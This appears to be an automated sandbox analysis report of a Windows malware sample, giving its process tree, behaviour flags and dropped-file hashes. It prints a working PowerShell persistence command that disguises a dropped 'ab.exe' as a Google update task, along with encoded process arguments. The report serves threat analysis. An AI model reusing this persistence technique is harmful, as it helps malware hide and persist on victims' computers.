C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qcoya#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\ab.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ab.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\ab.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4712 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe lutcoyhksuipfj2⤵PID:4732
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵PID:2180
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:3040 -
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe jqbazjfqnrolynda 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeNvlZ6DZqKQqPSVJ0y74VnV6dYqaP9EW9yUIjgmziHnBHN/JCwDZ3uk9UTRCSXVaebqmWY5H5Xin0jylLdr7tfTPmLhpiPsy1UNkCmXMWATQIwoLJfqgCh50rV7lqdllbiKZ9ueH41Cq8a/Hio9Y+9/52H7AhkPlhEKpKDhhyWtbzSI0DBir8/ypiQ8wbwNyS89qcchqERN5owTDWNX/lH8c9cfJPwhLaKXm7U1hMgV72n8oemdvQ2aGZ5yCGe+wpL/B7Rj93guVrg1ZRL7cErMhdP5/rzZOxoasBsCNEnySkqkS5DWukk6+I59plojahzJ9gOS2vW2Yzof/vsxvcZmWGNb+J0JHGYNDQEdhmfOfD4+BnlHdqvURqXqdf6UQil9Ejd74xINagHV1AyePTOqA1HcL1VCHK3L7dKYRCtXtqA1nI/mZM+RRN55S5kG5o2⤵PID:1392
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qmljvdjaranmuedc 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe1skUuA1B/sblOIHz5y0E3CjvcAWNZuj8V/rTegdRfQdB0T+45yCIrAKoritb4L1f8zdvmvLH+lK/O4bYurlfmWc4LJg9rMwCZygZSO91dhCEwiwkykMh2a7MSMA3t0M/2JvTZVSvwTTvFxAS5ArZbywOpOX3tMi2HrdsivNdio4KjvvCHqjroIXH9OHLykW6hlfAosSCVIoolLUU6RzA9oq+XPWpg6yIijzgXwClbaHOFYM0s2QXUC6b1YDoVQbcUATMgTmS+5cH21g3Gom1xTUPPWIcrVd8fmoLvTM+3Pzk9VEjLmBOjjFx2GxPBUHqM/B0+T4kiakOrOGFdLKGSbsX99mbD9sqepbm72jc7z5qnhbTJ5avbdqBSLD4eybbH45yo0U6o/H+OL3/+ye3Ry8qna/lC6V6QV0dQavAWoFZBd+jKvpDWAV9NgrfZJkIMel65USNJ020X+VU8zJTHA==2⤵PID:4892
-
C:\Program Files (x86)\Recorder\VideoRecorder.exe"C:\Program Files (x86)\Recorder\VideoRecorder.exe"1⤵
- Executes dropped EXE
PID:1896
-
C:\Program Files\Google\Chrome\ab.exe"C:\Program Files\Google\Chrome\ab.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1132
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
3.5MB
MD5feddea1d2ae08b032491316990e9f36e
SHA13186477228ad11006a8d920a82a44be0ffe2422b
SHA256fab1bccef0ad8e3cb321c3372a62517b28279a511ca182f616adde3d48e9ebdf
SHA51261f9bcdce471d199f41e279ec33e60ba86194965675f6ac61f80fdea70f5455e68f4f3225224ac358cf8902d9be0d75896ebf47099881667c8847cba00b0aebd
-
Filesize
3.5MB
MD5feddea1d2ae08b032491316990e9f36e
SHA13186477228ad11006a8d920a82a44be0ffe2422b
SHA256fab1bccef0ad8e3cb321c3372a62517b28279a511ca182f616adde3d48e9ebdf
SHA51261f9bcdce471d199f41e279ec33e60ba86194965675f6ac61f80fdea70f5455e68f4f3225224ac358cf8902d9be0d75896ebf47099881667c8847cba00b0aebd
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
1KB
MD55e3e218199811e4980461857215b10e4
SHA10281303771e2c3fa30ffbb1ef6bfc7f0666bd842
SHA256b35ba158da8abe40db98ee9a98bbaebe665ffdc16ad4e1a1cb2d01dcb014c3aa
SHA51241451cd1294a3c11b62111de67c20642525dc40c514ae43d0dd05cf94d3c06253f8c1e1dde1b922503a3d788b90b1fa8db24895d4e98300e04fc422e35e3d7dd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD5feddea1d2ae08b032491316990e9f36e
SHA13186477228ad11006a8d920a82a44be0ffe2422b
SHA256fab1bccef0ad8e3cb321c3372a62517b28279a511ca182f616adde3d48e9ebdf
SHA51261f9bcdce471d199f41e279ec33e60ba86194965675f6ac61f80fdea70f5455e68f4f3225224ac358cf8902d9be0d75896ebf47099881667c8847cba00b0aebd
-
Filesize
3.5MB
MD5feddea1d2ae08b032491316990e9f36e
SHA13186477228ad11006a8d920a82a44be0ffe2422b
SHA256fab1bccef0ad8e3cb321c3372a62517b28279a511ca182f616adde3d48e9ebdf
SHA51261f9bcdce471d199f41e279ec33e60ba86194965675f6ac61f80fdea70f5455e68f4f3225224ac358cf8902d9be0d75896ebf47099881667c8847cba00b0aebd
-
Filesize
3.5MB
MD5feddea1d2ae08b032491316990e9f36e
SHA13186477228ad11006a8d920a82a44be0ffe2422b
SHA256fab1bccef0ad8e3cb321c3372a62517b28279a511ca182f616adde3d48e9ebdf
SHA51261f9bcdce471d199f41e279ec33e60ba86194965675f6ac61f80fdea70f5455e68f4f3225224ac358cf8902d9be0d75896ebf47099881667c8847cba00b0aebd
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
908KB
MD55b57d2022c736cd5218df873456104e1
SHA1ed8ad733c18308d669ca2b470ee07de061ff1aa2
SHA256c2def6823301dd51f674bfae8cae527f0fa450a835bc2f3e3d91197f7e53b250
SHA512b0b14ee7d59e00accd3f9cbea8d674501d69758667d63341b7d2828474511a062a7d76ff2ff082927159e91470f17c2999a916fed98e7a4776de5eac63baffbd
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5